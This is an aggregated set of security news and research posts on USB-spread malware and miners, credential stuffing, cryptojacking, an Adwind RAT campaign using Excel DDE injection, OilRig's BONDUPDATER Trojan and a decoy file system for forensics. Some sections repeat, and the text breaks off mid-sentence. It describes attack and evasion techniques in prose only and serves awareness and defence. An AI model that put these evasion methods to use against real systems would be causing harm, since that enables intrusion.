For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

Miners – rare but persistent

USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

Year Detection data for Trojan.Win32.Miner.ays Unique user count
2017 778,620 236,000
2018 (estimate based on H1) 600,698 196,866

Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

These results suggest that propagation via removable media works well for this threat.

Detection data for Trojan.Win64.Miner.all is as follows:

Year Detection data for
Trojan.Win64.Miner.all
Unique user count YoY change Unique user count as share of all users hit with a removable media threat
2016 4,211,246 245,702 +70.15% 4.2%
2017 4,214,785 301,178 +18.42% 6.7%
2018 (estimate based on H1) 4,209,958 362,242 +16.42% 9.2%

Dark Tequila – advanced banking malware

In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

Target geography

Emerging markets appear to be the most vulnerable to infection by removable media.

The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

Conclusion and advice

The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

Advice for all USB users:

  • Be careful about the devices you connect to your computer – do you know where it came from?
  • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
  • Make sure all data stored on the USB is also encrypted
  • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

Additional advice for businesses:

  • Manage the use of USB devices: define which USB devices can be used, by whom and for what
  • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
  • Don’t leave USBs lying around or on display

Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

Securelist – Kaspersky Lab’s cyberthreat research and reports: USB threats from malware to miners

Introduction

In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

Methodology and key findings

The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

Key findings

  • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
  • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.

The evolving cyberthreat landscape for USBs

Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

&&

*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

&&

*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

USBs as a tool for advanced threat actors

USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.

The Stuxnet survivor CVE-2010-2568

Microsoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability, (although it was overtaken in 2017 by the EternalBlue exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

&&

Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

&&

Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

Malware delivered via removable media

The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

Miners – rare but persistent

USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

Year Detection data for Trojan.Win32.Miner.ays Unique user count
2017 778,620 236,000
2018 (estimate based on H1) 600,698 196,866

Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

These results suggest that propagation via removable media works well for this threat.

Detection data for Trojan.Win64.Miner.all is as follows:

Year Detection data for
Trojan.Win64.Miner.all
Unique user count YoY change Unique user count as share of all users hit with a removable media threat
2016 4,211,246 245,702 +70.15% 4.2%
2017 4,214,785 301,178 +18.42% 6.7%
2018 (estimate based on H1) 4,209,958 362,242 +16.42% 9.2%

Dark Tequila – advanced banking malware

In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

Target geography

Emerging markets appear to be the most vulnerable to infection by removable media.

The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

&&

Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

&&

Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

Conclusion and advice

The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

Advice for all USB users:

  • Be careful about the devices you connect to your computer – do you know where it came from?
  • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
  • Make sure all data stored on the USB is also encrypted
  • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

Additional advice for businesses:

  • Manage the use of USB devices: define which USB devices can be used, by whom and for what
  • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
  • Don’t leave USBs lying around or on display

Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.



Securelist - Kaspersky Lab’s cyberthreat research and reports

Stealthy cryptomining apps still on Google Play

Researchers have flagged 25 apps on Google Play that are surreptitiously mining cryptocurrency for their developers, and some of these have still not been removed, they warn. About the malicious apps Disguised as games, utilities and educational offerings, these malicious apps have been downloaded and installed more than 120,000 times. “Most of the apps were found to have embedded code from Coinhive, a JavaScript implementation to mine Monero,” the researchers explained. “The miner code, which … More

The post Stealthy cryptomining apps still on Google Play appeared first on Help Net Security.

Security Affairs: Akamai Report: Credential stuffing attacks are a growing threat

According to Akamai’s latest State of the Internet report on credential stuffing, credential stuffing continues to be growing threat.

According to Akamai report titled “[state of the internet] / security CREDENTIAL STUFFING ATTACKS  the credential stuffing attacks are a growing threat and often underestimated.

Credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing attacks and data breaches. This kind of attacks is very efficient due to the bad habit of users of reusing the same password over multiple services.

The experts detected 8.3 Billion malicious login attempts from bots in May and June, an overall number of 30 billion malicious logins were observed between November 2017 and June 2018, an average of 3.75 billion per month.

“These botnets attempt to log into a target site in order to assume an identity, gather information, or steal money and goods.” states the report published by Akamai.

“They use lists of usernames and passwords gathered from the breaches you hear about nearly every day on the news. They’re also one of the main reasons you should be using a password manager to create unique and random strings for your passwords.”

According to the experts, botnets involved in the attacks across multiple domains, attempt to hide their activity using a low volume of attempts in a long time, a method referred with the term “low and slow.” This technique allows attackers to hide malicious logins within the normal traffic volumes.

Financial and retail sectors are the most targeted by hackers using this attack technique simply because it is easy for attackers to monetize their efforts by compromising customers’ accounts.

The report describes a large credential-stuffing attack on a US credit union, the malicious login traffic had spiked from a daily average of 800 per hour to 8,723 attempts per hour. During the week, the union observed 315,000 malicious login attempts from nearly 20,000 different IP addresses, while the number of HTTP User Agent connections was 4,382 from fewer than 2,000 autonomous system numbers.

credential stuffing

In another attack, a large financial services institution received over 350,000 login attempts in just one afternoon.

Most of the credential stuffing attacks were originated in the US (2.82 billion attempts), followed by Russia (1.55 billion attempts). Most of the targets are located in the US because data of American citizens are involved in a large number of data breaches.

“One of the main reasons many organizations don’t have stronger controls to prevent credential stuffing is that 70% of the people surveyed believe the tools needed to defend against these attacks diminish the web experience of legitimate users.” concludes the report published by the experts.

“Clearly, credential stuffing defenses need to able to function without introducing user lag to be successful.”

Pierluigi Paganini

(Security Affairs – credential stuffing, hacking)

The post Akamai Report: Credential stuffing attacks are a growing threat appeared first on Security Affairs.



Security Affairs

Akamai Report: Credential stuffing attacks are a growing threat

According to Akamai’s latest State of the Internet report on credential stuffing, credential stuffing continues to be growing threat.

According to Akamai report titled “[state of the internet] / security CREDENTIAL STUFFING ATTACKS  the credential stuffing attacks are a growing threat and often underestimated.

Credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing attacks and data breaches. This kind of attacks is very efficient due to the bad habit of users of reusing the same password over multiple services.

The experts detected 8.3 Billion malicious login attempts from bots in May and June, an overall number of 30 billion malicious logins were observed between November 2017 and June 2018, an average of 3.75 billion per month.

“These botnets attempt to log into a target site in order to assume an identity, gather information, or steal money and goods.” states the report published by Akamai.

“They use lists of usernames and passwords gathered from the breaches you hear about nearly every day on the news. They’re also one of the main reasons you should be using a password manager to create unique and random strings for your passwords.”

According to the experts, botnets involved in the attacks across multiple domains, attempt to hide their activity using a low volume of attempts in a long time, a method referred with the term “low and slow.” This technique allows attackers to hide malicious logins within the normal traffic volumes.

Financial and retail sectors are the most targeted by hackers using this attack technique simply because it is easy for attackers to monetize their efforts by compromising customers’ accounts.

The report describes a large credential-stuffing attack on a US credit union, the malicious login traffic had spiked from a daily average of 800 per hour to 8,723 attempts per hour. During the week, the union observed 315,000 malicious login attempts from nearly 20,000 different IP addresses, while the number of HTTP User Agent connections was 4,382 from fewer than 2,000 autonomous system numbers.

credential stuffing

In another attack, a large financial services institution received over 350,000 login attempts in just one afternoon.

Most of the credential stuffing attacks were originated in the US (2.82 billion attempts), followed by Russia (1.55 billion attempts). Most of the targets are located in the US because data of American citizens are involved in a large number of data breaches.

“One of the main reasons many organizations don’t have stronger controls to prevent credential stuffing is that 70% of the people surveyed believe the tools needed to defend against these attacks diminish the web experience of legitimate users.” concludes the report published by the experts.

“Clearly, credential stuffing defenses need to able to function without introducing user lag to be successful.”

Pierluigi Paganini

(Security Affairs – credential stuffing, hacking)

The post Akamai Report: Credential stuffing attacks are a growing threat appeared first on Security Affairs.

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If attacker can steal Bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems. There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If an attacker can hijack enough systems, mining in high volume can be profitable. Not only individuals struggle with protecting against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.

Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT), the samples used in the recently discovered campaign are Adwind 3.0 RAT and leverage the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

The campaign was uncovered at the end of August, attackers mainly targeted users in Turkey (75%), experts noticed that other victims were located in Germany, but likely members of the Turkish community.

The spam campaign uncovered by the experts leveraged on malicious documents that were written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign that use both the .csv or .xlt files that are opened by default by Microsoft Excel.

Both of them would leverage a new variant of the DDE code injection attack, although this technique is well-known, the variant used in this campaign is still undetected.

The dropper file can have more than 30 different file extensions some of them are not opened by Excel by default, however, the attackers can use a script launching Excel with a file with one of these extensions as a parameter.

“Formats like CSV doesn’t have a predefined header, thus it can contain any kind of data at the beginning. Having random data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” continues the report.

Adwind campaign

Excel will display differed warnings to the user regarding the execution of code, the first related to the execution of a corrupted file, the second one notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that attackers aim at injecting code that would create and execute a Visual Basic Script that uses the bitasdmin Microsoft tool to download or upload jobs and monitor their progress, to get the final payload in the form of a Java archive.

The Java code is packed with the demo version of the “Allatori Obfuscator commercial packer, version 4.7.

The final payload is a sample the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations.” Talos concludes.

“This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,” 

Further details, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – Adwind RAT, malware-as-a-service)

The post Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems appeared first on Security Affairs.

A week in security (September 17 – 23)

Last week, we took a look at a low level spam campaign on Twitter, explored the signs of falling victim to phishing, and examined a massive WordPress compromise. We also explained some SASL vulnerabilities and covered a breaking Emotet spam campaign.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (September 17 – 23) appeared first on Malwarebytes Labs.

Malware hits Freelancers at Fiverr and Freelancer.com

By Waqas

Unfortunately, unsuspected freelancers are falling for the malware scam.  Fiverr and Freelancer.com are two of the most popular websites for freelancers and clients looking for skilled professionals. Currently, both sites have millions of registered users from hundreds of countries and that makes them lucrative targets for cybercriminals. Recently, security researchers at MalwareHunterTeam have discovered a new piece of […]

This is a post from HackRead.com Read the original post: Malware hits Freelancers at Fiverr and Freelancer.com

OilRig Group Aims BONDUPDATER Trojan Malware at Middle Eastern Governments

The OilRig threat group launched an attack involving the BONDUPDATER Trojan malware against a high-ranking government office in the Middle East.

According to Palo Alto Networks’ Unit 42, the threat group sent a series of spear phishing emails with a blank subject line to government workers in the region last month. Anyone who opened the attachment risked activating the latest version of BONDUPDATER, which offers backdoor functionality that lets threat actors execute commands and download files on infected machines.

OilRig, which has been active for at least two years, had previously used the Trojan malware in similar attacks against Middle Eastern governments.

What’s New in This Version of BONDUPDATER?

BONDUPDATER was first spotted in November 2017 and is based on Microsoft’s PowerShell. In the most recent attack, however, researchers found that the spear phishing emails contained a Word document with a macro that installed the Trojan malware. The process involved creating a series of files on the victim’s system and then gaining persistence by dropping a script that scheduled a task to execute every minute.

This version of BONDUPDATER used TXT records to communicate with the command-and-control (C&C) server as well as the Domain Name System (DNS) A records, which it received by using a DNS tunneling protocol. This follows a pattern in which OilRig doesn’t always develop new tools, but simply saves development time by building on Trojan malware that’s already part of its arsenal.

Avoid Trojan Malware With UBA and IAM

In a recent podcast, IBM experts recommended layering on user behavior analytics (UBA) with identity and access management (IAM), which can make it easier to detect when employees exhibit potentially risky behaviors. This should be coupled with ongoing efforts to educate users about phishing schemes.

Source: Palo Alto Networks

The post OilRig Group Aims BONDUPDATER Trojan Malware at Middle Eastern Governments appeared first on Security Intelligence.

Following the Clues With DcyFS: A File System for Forensics

This article concludes our three-part series on Decoy File System (DcyFS) with a concrete example of how a cyber deception platform can also be a powerful tool for extracting forensic summaries. Using that data can expedite postmortem investigations, reveal attributing features of malware, and characterize the impact of attackers’ actions. Be sure to read part 1 and part 2 for the full story.

File System Overlays as Blank Canvases

When using Decoy File System (DcyFS), each subject’s view contains a stackable file system with an overlay layer. This layer helps protect files on the base file system, providing data integrity and confidentiality. The overlay also acts as a blank canvas, recording all created, modified and deleted files during suspicious user activity or the execution of an untrusted process.

These records are essential to piecing together what happens during a cyberattack as the overlay provides evidence of key indicators of compromise (IoCs) that investigators can use. To demonstrate the forensic capabilities of our approach, we created a module that analyzes overlays for IoCs and tested it with five different types of malware. The IoCs were sourced from the ATT&CK for Enterprise threat model.

DcyFS and the Forensics of Malware

Let’s take a closer look at the five malware types we identified with DcyFS’s analysis module and the IoCs collected through the file system overlays. We’ll also discuss how the file system actively helped protect critical systems from malware in our tests.

Persistence

Most malware is designed to persist on an infected endpoint and relaunch after a system reboot. The exact mechanism for persistence is dependent on whether the malware gains access to administrator privileges on the endpoint. If it does not, then the malware will typically modify user profile files that are run on startup.

Malware running with escalated privileges can modify systemwide configurations in order to persist. This is achieved by dropping initialization scripts into the system run-level directories. In certain cases, malware will create reoccurring tasks that ensure the malware is run on a schedule, persisting across reboots.

Each time a piece of malware modifies a system file, the changes are recorded on DcyFS’s overlay, enabling the forensic analyzer to easily identify malicious activity. Furthermore, since DcyFS provides per-process views to the malware, no file changes by the malware persist across the global file system view. This also means the malware is not restarted on a reboot.

Dynamic Link Library (DLL) Injection

Some malware, such as Umbreon and Jynx2, are not executables, but rather libraries designed to be preloaded by system processes. The libraries replace important system application programming interface (API) calls to change the functionality of a running application. In this way, an Apache web server can be turned into a backdoor, or a Bash shell can be hijacked to mine bitcoins in the background.

In Umbreon’s case, the malware replaces C API calls such as “accept,” “access” and “open” to hide its presence on the file system from an antivirus system or the system user. Umbreon also creates a user, and hides its presence using injected API calls. Such file system changes are identified by DcyFS, as is the injected malicious library. Furthermore, since the library is only loaded in its own view, it cannot be injected into any process running on the system.

Binary Downloaders (Modifiers)

Cybercrime is a mercurial commodity business, where large criminal syndicates rent access to extensive botnets to other attackers. These bots are designed to send malicious spam or download various pieces of malware, such as banking Trojans, bitcoin miners and keyloggers, to collect stolen data that can be monetized by the syndicate.

With administrative access to an infected endpoint, bots will try to download malware into many system directories, creating redundancy in hopes that the defender will miss one when detected. As a result, newly installed binary downloads on a file system are a key IoC.

Aside from downloading new binaries, malware can also alter existing system binaries to make them secretly engage in nefarious activities. While running on DcyFS, these binary modifiers only appear to modify the overlay they can access — they are unable to modify the applications in the global view of the base file system. Consequently, they are never truly executed, but the modified binary appears prominently on the overlay, where it can be extracted and analyzed by a forensics team.

Backdoors

Typically, skilled attackers will try to cover their tracks to evade detection. One way of doing this is by saving malware into hidden files, such as any file starting with a period, or modifying programs such as “ls” or “dir” so that malware files are ignored when the contents of a directory are displayed to a user.

Another technique for hiding one’s presence is to remove entries from a user’s history profile or deleting task entries that conduct antivirus scans. Finally, killing or deleting antivirus software is another mechanism for ensuring that malicious activities are not uncovered. With DcyFS, each step used to cover one’s tracks is highlighted on the file system’s overlay.

Ransomware and Beyond

Ransomware has become a prominent part of the attack eco